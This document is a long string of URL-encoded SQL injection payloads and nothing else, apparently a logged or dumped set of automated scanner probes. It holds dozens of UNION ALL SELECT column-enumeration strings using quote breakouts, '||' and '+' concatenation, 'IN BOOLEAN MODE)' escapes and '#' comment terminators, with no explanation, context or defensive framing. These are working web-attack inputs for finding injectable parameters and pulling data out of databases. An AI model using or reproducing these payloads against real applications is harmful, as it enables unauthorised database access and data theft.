-5039%27%20%7C%7C%20%28SELECT%206571%20FROM%20DUAL%20WHERE%209583%3D9583%20UNION%20ALL%20SELECT%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%2C%209583%23%20%29%20%7C%7C%20%27 -7527%27%20%7C%7C%20%28SELECT%208878%20FROM%20DUAL%20WHERE%205410%3D5410%20UNION%20ALL%20SELECT%205410%2C%205410%2C%205410%2C%205410%2C%205410%2C%205410%2C%205410%2C%205410%2C%205410%2C%205410%2C%205410%2C%205410%2C%205410%2C%205410%2C%205410%2C%205410%2C%205410%2C%205410%2C%205410%23%20%29%20%7C%7C%20%27 -4232%27%20%7C%7C%20%28SELECT%204954%20FROM%20DUAL%20WHERE%206253%3D6253%20UNION%20ALL%20SELECT%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%2C%206253%23%20%29%20%7C%7C%20%27 -5527%27%20%7C%7C%20%28SELECT%205884%20WHERE%207198%3D7198%20UNION%20ALL%20SELECT%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%2C%207198%23%20%29%20%7C%7C%20%27 -5389%27%20%7C%7C%20%28SELECT%205442%20WHERE%204014%3D4014%20UNION%20ALL%20SELECT%204014%2C%204014%2C%204014%2C%204014%2C%204014%2C%204014%2C%204014%2C%204014%2C%204014%2C%204014%2C%204014%2C%204014%23%20%29%20%7C%7C%20%27 -1579%27%20%7C%7C%20%28SELECT%201210%20WHERE%207768%3D7768%20UNION%20ALL%20SELECT%207768%2C%207768%2C%207768%2C%207768%2C%207768%2C%207768%2C%207768%2C%207768%2C%207768%2C%207768%2C%207768%2C%207768%2C%207768%23%20%29%20%7C%7C%20%27 -4574%27%20%7C%7C%20%28SELECT%206441%20WHERE%209057%3D9057%20UNION%20ALL%20SELECT%209057%2C%209057%2C%209057%2C%209057%2C%209057%2C%209057%2C%209057%2C%209057%2C%209057%2C%209057%2C%209057%2C%209057%2C%209057%2C%209057%23%20%29%20%7C%7C%20%27 -5699%27%20%7C%7C%20%28SELECT%207366%20WHERE%206337%3D6337%20UNION%20ALL%20SELECT%206337%2C%206337%2C%206337%2C%206337%2C%206337%2C%206337%2C%206337%2C%206337%2C%206337%2C%206337%2C%206337%2C%206337%2C%206337%2C%206337%2C%206337%23%20%29%20%7C%7C%20%27 -2899%27%20%7C%7C%20%28SELECT%206280%20WHERE%206982%3D6982%20UNION%20ALL%20SELECT%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%2C%206982%23%20%29%20%7C%7C%20%27 -4626%27%20%7C%7C%20%28SELECT%209623%20WHERE%202623%3D2623%20UNION%20ALL%20SELECT%202623%2C%202623%2C%202623%2C%202623%2C%202623%2C%202623%2C%202623%2C%202623%2C%202623%2C%202623%2C%202623%2C%202623%2C%202623%2C%202623%2C%202623%2C%202623%2C%202623%23%20%29%20%7C%7C%20%27 -5481%27%20%7C%7C%20%28SELECT%207509%20WHERE%203535%3D3535%20UNION%20ALL%20SELECT%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%2C%203535%23%20%29%20%7C%7C%20%27 -2217%27%20%7C%7C%20%28SELECT%206922%20WHERE%201142%3D1142%20UNION%20ALL%20SELECT%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%2C%201142%23%20%29%20%7C%7C%20%27 -2503%27%20%7C%7C%20%28SELECT%207150%20WHERE%205808%3D5808%20UNION%20ALL%20SELECT%205808%2C%205808%2C%205808%2C%205808%2C%205808%2C%205808%2C%205808%2C%205808%2C%205808%2C%205808%2C%205808%2C%205808%2C%205808%2C%205808%2C%205808%2C%205808%2C%205808%2C%205808%2C%205808%2C%205808%23%20%29%20%7C%7C%20%27 -3815%20%2B%20%28SELECT%209761%20FROM%20DUAL%20WHERE%206538%3D6538%20UNION%20ALL%20SELECT%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%2C%206538%23%20%29 -4010%20%2B%20%28SELECT%207107%20FROM%20DUAL%20WHERE%206628%3D6628%20UNION%20ALL%20SELECT%206628%2C%206628%2C%206628%2C%206628%2C%206628%2C%206628%2C%206628%2C%206628%2C%206628%2C%206628%2C%206628%2C%206628%23%20%29 -1660%20%2B%20%28SELECT%209349%20FROM%20DUAL%20WHERE%203564%3D3564%20UNION%20ALL%20SELECT%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%2C%203564%23%20%29 -1028%20%2B%20%28SELECT%208325%20FROM%20DUAL%20WHERE%209154%3D9154%20UNION%20ALL%20SELECT%209154%2C%209154%2C%209154%2C%209154%2C%209154%2C%209154%2C%209154%2C%209154%2C%209154%2C%209154%2C%209154%2C%209154%2C%209154%2C%209154%23%20%29 -1157%20%2B%20%28SELECT%205689%20FROM%20DUAL%20WHERE%201289%3D1289%20UNION%20ALL%20SELECT%201289%2C%201289%2C%201289%2C%201289%2C%201289%2C%201289%2C%201289%2C%201289%2C%201289%2C%201289%2C%201289%2C%201289%2C%201289%2C%201289%2C%201289%23%20%29 -8819%20%2B%20%28SELECT%204898%20FROM%20DUAL%20WHERE%207795%3D7795%20UNION%20ALL%20SELECT%207795%2C%207795%2C%207795%2C%207795%2C%207795%2C%207795%2C%207795%2C%207795%2C%207795%2C%207795%2C%207795%2C%207795%2C%207795%2C%207795%2C%207795%2C%207795%23%20%29 -8194%20%2B%20%28SELECT%205842%20FROM%20DUAL%20WHERE%208209%3D8209%20UNION%20ALL%20SELECT%208209%2C%208209%2C%208209%2C%208209%2C%208209%2C%208209%2C%208209%2C%208209%2C%208209%2C%208209%2C%208209%2C%208209%2C%208209%2C%208209%2C%208209%2C%208209%2C%208209%23%20%29 -1444%20%2B%20%28SELECT%206595%20FROM%20DUAL%20WHERE%202816%3D2816%20UNION%20ALL%20SELECT%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%2C%202816%23%20%29 -5366%20%2B%20%28SELECT%207594%20FROM%20DUAL%20WHERE%203206%3D3206%20UNION%20ALL%20SELECT%203206%2C%203206%2C%203206%2C%203206%2C%203206%2C%203206%2C%203206%2C%203206%2C%203206%2C%203206%2C%203206%2C%203206%2C%203206%2C%203206%2C%203206%2C%203206%2C%203206%2C%203206%2C%203206%23%20%29 -8291%20%2B%20%28SELECT%203900%20FROM%20DUAL%20WHERE%201123%3D1123%20UNION%20ALL%20SELECT%201123%2C%201123%2C%201123%2C%201123%2C%201123%2C%201123%2C%201123%2C%201123%2C%201123%2C%201123%2C%201123%2C%201123%2C%201123%2C%201123%2C%201123%2C%201123%2C%201123%2C%201123%2C%201123%2C%201123%23%20%29 -3486%20%2B%20%28SELECT%207439%20WHERE%204769%3D4769%20UNION%20ALL%20SELECT%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%2C%204769%23%20%29 -9598%20%2B%20%28SELECT%201859%20WHERE%202988%3D2988%20UNION%20ALL%20SELECT%202988%2C%202988%2C%202988%2C%202988%2C%202988%2C%202988%2C%202988%2C%202988%2C%202988%2C%202988%2C%202988%2C%202988%23%20%29 -2374%20%2B%20%28SELECT%207309%20WHERE%202909%3D2909%20UNION%20ALL%20SELECT%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%2C%202909%23%20%29 -7738%20%2B%20%28SELECT%204565%20WHERE%203630%3D3630%20UNION%20ALL%20SELECT%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%2C%203630%23%20%29 -1779%20%2B%20%28SELECT%209294%20WHERE%208434%3D8434%20UNION%20ALL%20SELECT%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%2C%208434%23%20%29 -6826%20%2B%20%28SELECT%206179%20WHERE%205947%3D5947%20UNION%20ALL%20SELECT%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%23%20%29 -4619%20%2B%20%28SELECT%203477%20WHERE%204390%3D4390%20UNION%20ALL%20SELECT%204390%2C%204390%2C%204390%2C%204390%2C%204390%2C%204390%2C%204390%2C%204390%2C%204390%2C%204390%2C%204390%2C%204390%2C%204390%2C%204390%2C%204390%2C%204390%2C%204390%23%20%29 -9264%20%2B%20%28SELECT%209264%20WHERE%201540%3D1540%20UNION%20ALL%20SELECT%201540%2C%201540%2C%201540%2C%201540%2C%201540%2C%201540%2C%201540%2C%201540%2C%201540%2C%201540%2C%201540%2C%201540%2C%201540%2C%201540%2C%201540%2C%201540%2C%201540%2C%201540%23%20%29 -8287%20%2B%20%28SELECT%203634%20WHERE%209387%3D9387%20UNION%20ALL%20SELECT%209387%2C%209387%2C%209387%2C%209387%2C%209387%2C%209387%2C%209387%2C%209387%2C%209387%2C%209387%2C%209387%2C%209387%2C%209387%2C%209387%2C%209387%2C%209387%2C%209387%2C%209387%2C%209387%23%20%29 -2858%20%2B%20%28SELECT%202189%20WHERE%202354%3D2354%20UNION%20ALL%20SELECT%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%2C%202354%23%20%29 -2826%27%20%2B%20%28SELECT%20%27oIzg%27%20FROM%20DUAL%20WHERE%207818%3D7818%20UNION%20ALL%20SELECT%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%2C%207818%23%20%29%20%2B%20%27 -5611%27%20%2B%20%28SELECT%20%27kfHg%27%20FROM%20DUAL%20WHERE%209890%3D9890%20UNION%20ALL%20SELECT%209890%2C%209890%2C%209890%2C%209890%2C%209890%2C%209890%2C%209890%2C%209890%2C%209890%2C%209890%2C%209890%2C%209890%23%20%29%20%2B%20%27 -8223%27%20%2B%20%28SELECT%20%27HOmq%27%20FROM%20DUAL%20WHERE%203631%3D3631%20UNION%20ALL%20SELECT%203631%2C%203631%2C%203631%2C%203631%2C%203631%2C%203631%2C%203631%2C%203631%2C%203631%2C%203631%2C%203631%2C%203631%2C%203631%23%20%29%20%2B%20%27 -2560%27%20%2B%20%28SELECT%20%27ltNu%27%20FROM%20DUAL%20WHERE%205248%3D5248%20UNION%20ALL%20SELECT%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%2C%205248%23%20%29%20%2B%20%27 -6327%27%20%2B%20%28SELECT%20%27ujdU%27%20FROM%20DUAL%20WHERE%208942%3D8942%20UNION%20ALL%20SELECT%208942%2C%208942%2C%208942%2C%208942%2C%208942%2C%208942%2C%208942%2C%208942%2C%208942%2C%208942%2C%208942%2C%208942%2C%208942%2C%208942%2C%208942%23%20%29%20%2B%20%27 -9572%27%20%2B%20%28SELECT%20%27pkqD%27%20FROM%20DUAL%20WHERE%205017%3D5017%20UNION%20ALL%20SELECT%205017%2C%205017%2C%205017%2C%205017%2C%205017%2C%205017%2C%205017%2C%205017%2C%205017%2C%205017%2C%205017%2C%205017%2C%205017%2C%205017%2C%205017%2C%205017%23%20%29%20%2B%20%27 -7705%27%20%2B%20%28SELECT%20%27eNvw%27%20FROM%20DUAL%20WHERE%204005%3D4005%20UNION%20ALL%20SELECT%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%2C%204005%23%20%29%20%2B%20%27 -3948%27%20%2B%20%28SELECT%20%27pmJE%27%20FROM%20DUAL%20WHERE%208613%3D8613%20UNION%20ALL%20SELECT%208613%2C%208613%2C%208613%2C%208613%2C%208613%2C%208613%2C%208613%2C%208613%2C%208613%2C%208613%2C%208613%2C%208613%2C%208613%2C%208613%2C%208613%2C%208613%2C%208613%2C%208613%23%20%29%20%2B%20%27 -5026%27%20%2B%20%28SELECT%20%27qKOv%27%20FROM%20DUAL%20WHERE%208402%3D8402%20UNION%20ALL%20SELECT%208402%2C%208402%2C%208402%2C%208402%2C%208402%2C%208402%2C%208402%2C%208402%2C%208402%2C%208402%2C%208402%2C%208402%2C%208402%2C%208402%2C%208402%2C%208402%2C%208402%2C%208402%2C%208402%23%20%29%20%2B%20%27 -6295%27%20%2B%20%28SELECT%20%27zepc%27%20FROM%20DUAL%20WHERE%205108%3D5108%20UNION%20ALL%20SELECT%205108%2C%205108%2C%205108%2C%205108%2C%205108%2C%205108%2C%205108%2C%205108%2C%205108%2C%205108%2C%205108%2C%205108%2C%205108%2C%205108%2C%205108%2C%205108%2C%205108%2C%205108%2C%205108%2C%205108%23%20%29%20%2B%20%27 -5524%27%20%2B%20%28SELECT%20%27qdkj%27%20WHERE%201257%3D1257%20UNION%20ALL%20SELECT%201257%2C%201257%2C%201257%2C%201257%2C%201257%2C%201257%2C%201257%2C%201257%2C%201257%2C%201257%2C%201257%23%20%29%20%2B%20%27 -6259%27%20%2B%20%28SELECT%20%27lSGz%27%20WHERE%205516%3D5516%20UNION%20ALL%20SELECT%205516%2C%205516%2C%205516%2C%205516%2C%205516%2C%205516%2C%205516%2C%205516%2C%205516%2C%205516%2C%205516%2C%205516%23%20%29%20%2B%20%27 -2752%27%20%2B%20%28SELECT%20%27pXuy%27%20WHERE%201875%3D1875%20UNION%20ALL%20SELECT%201875%2C%201875%2C%201875%2C%201875%2C%201875%2C%201875%2C%201875%2C%201875%2C%201875%2C%201875%2C%201875%2C%201875%2C%201875%23%20%29%20%2B%20%27 -5645%27%20%2B%20%28SELECT%20%27OyYE%27%20WHERE%208798%3D8798%20UNION%20ALL%20SELECT%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%2C%208798%23%20%29%20%2B%20%27 -6976%27%20%2B%20%28SELECT%20%27tOkE%27%20WHERE%202893%3D2893%20UNION%20ALL%20SELECT%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%2C%202893%23%20%29%20%2B%20%27 -6632%27%20%2B%20%28SELECT%20%27lYnj%27%20WHERE%206344%3D6344%20UNION%20ALL%20SELECT%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%2C%206344%23%20%29%20%2B%20%27 -4006%27%20%2B%20%28SELECT%20%27bpod%27%20WHERE%206792%3D6792%20UNION%20ALL%20SELECT%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%2C%206792%23%20%29%20%2B%20%27 -7197%27%20%2B%20%28SELECT%20%27IUZx%27%20WHERE%201948%3D1948%20UNION%20ALL%20SELECT%201948%2C%201948%2C%201948%2C%201948%2C%201948%2C%201948%2C%201948%2C%201948%2C%201948%2C%201948%2C%201948%2C%201948%2C%201948%2C%201948%2C%201948%2C%201948%2C%201948%2C%201948%23%20%29%20%2B%20%27 -7051%27%20%2B%20%28SELECT%20%27eIpm%27%20WHERE%206013%3D6013%20UNION%20ALL%20SELECT%206013%2C%206013%2C%206013%2C%206013%2C%206013%2C%206013%2C%206013%2C%206013%2C%206013%2C%206013%2C%206013%2C%206013%2C%206013%2C%206013%2C%206013%2C%206013%2C%206013%2C%206013%2C%206013%23%20%29%20%2B%20%27 -3650%27%20%2B%20%28SELECT%20%27nGQq%27%20WHERE%205235%3D5235%20UNION%20ALL%20SELECT%205235%2C%205235%2C%205235%2C%205235%2C%205235%2C%205235%2C%205235%2C%205235%2C%205235%2C%205235%2C%205235%2C%205235%2C%205235%2C%205235%2C%205235%2C%205235%2C%205235%2C%205235%2C%205235%2C%205235%23%20%29%20%2B%20%27 -1846%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%2C%206563%23%20%23 -8625%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207607%2C%207607%2C%207607%2C%207607%2C%207607%2C%207607%2C%207607%2C%207607%2C%207607%2C%207607%2C%207607%2C%207607%23%20%23 -9227%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207338%2C%207338%2C%207338%2C%207338%2C%207338%2C%207338%2C%207338%2C%207338%2C%207338%2C%207338%2C%207338%2C%207338%2C%207338%23%20%23 -6552%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209894%2C%209894%2C%209894%2C%209894%2C%209894%2C%209894%2C%209894%2C%209894%2C%209894%2C%209894%2C%209894%2C%209894%2C%209894%2C%209894%23%20%23 -9578%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202349%2C%202349%2C%202349%2C%202349%2C%202349%2C%202349%2C%202349%2C%202349%2C%202349%2C%202349%2C%202349%2C%202349%2C%202349%2C%202349%2C%202349%23%20%23 -7154%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201206%2C%201206%2C%201206%2C%201206%2C%201206%2C%201206%2C%201206%2C%201206%2C%201206%2C%201206%2C%201206%2C%201206%2C%201206%2C%201206%2C%201206%2C%201206%23%20%23 -4012%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209794%2C%209794%2C%209794%2C%209794%2C%209794%2C%209794%2C%209794%2C%209794%2C%209794%2C%209794%2C%209794%2C%209794%2C%209794%2C%209794%2C%209794%2C%209794%2C%209794%23%20%23 -2576%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202835%2C%202835%2C%202835%2C%202835%2C%202835%2C%202835%2C%202835%2C%202835%2C%202835%2C%202835%2C%202835%2C%202835%2C%202835%2C%202835%2C%202835%2C%202835%2C%202835%2C%202835%23%20%23 -8035%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204491%2C%204491%2C%204491%2C%204491%2C%204491%2C%204491%2C%204491%2C%204491%2C%204491%2C%204491%2C%204491%2C%204491%2C%204491%2C%204491%2C%204491%2C%204491%2C%204491%2C%204491%2C%204491%23%20%23 -3103%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%2C%209902%23%20%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 